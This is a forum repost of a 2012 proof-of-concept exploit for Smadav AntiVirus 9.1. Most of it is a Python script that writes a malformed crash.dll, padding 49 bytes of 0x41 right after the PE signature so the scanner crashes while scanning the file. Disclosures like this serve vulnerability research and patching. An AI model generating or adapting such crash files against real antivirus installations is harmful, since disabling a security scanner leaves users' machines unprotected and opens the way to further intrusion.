Exploit Smadav Anti Virus 9.1 - Crash (PoC)

Exploiter · 21 Дек 2022

Код:

# Exploit Title: Smadav AntiVirus - Crash PoC
# Date: 10/Nov/2012
# Exploit Author: Mada R Perdhana ([email protected]) / Spentera Research
Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id
# Software Link: http://www.smadav.net/download
# Version: 9.1 (Lastest Version, should be affected previous version)
# Tested on: Windows XP SP 2


The product will be crash when scanning a malicious .dll generate using
this script

----python--
file = open("crash.dll","wb")
file.write("\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x41\x41\x41\x41\x41\x41\x41\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x8c\x9c\x76\x90\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\x4b\xf5\x45\xc3\xcb\xfd\x18\xc3\xc8\xfd\x19\xc3\x53\xfd\x18\xc3\x46\xea\x78\xc3\xdf\xfd\x18\xc3\x46\xea\x17\xc3\x85\xfd\x18\xc3\x46\xea\x47\xc3\xc7\xff\x18\xc3\x46\xea\x44\xc3\xc9\xfd\x18\xc3\x46\xea\x46\xc3\xc9\xfd\x18\xc3\x46\xea\x42\xc3\xc9\xfd\x18\xc3\x52\x69\x63\x68\xc8\xfd\x18\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
file.close()
-------

The trick is by adding 49 bytes of malicious byte (represent with \x41)
into the .dll file, right after the PE (\x50\x45) header on the 244th byte
of the file.

Поиск

Exploit Smadav Anti Virus 9.1 - Crash (PoC)

Exploiter

Похожие темы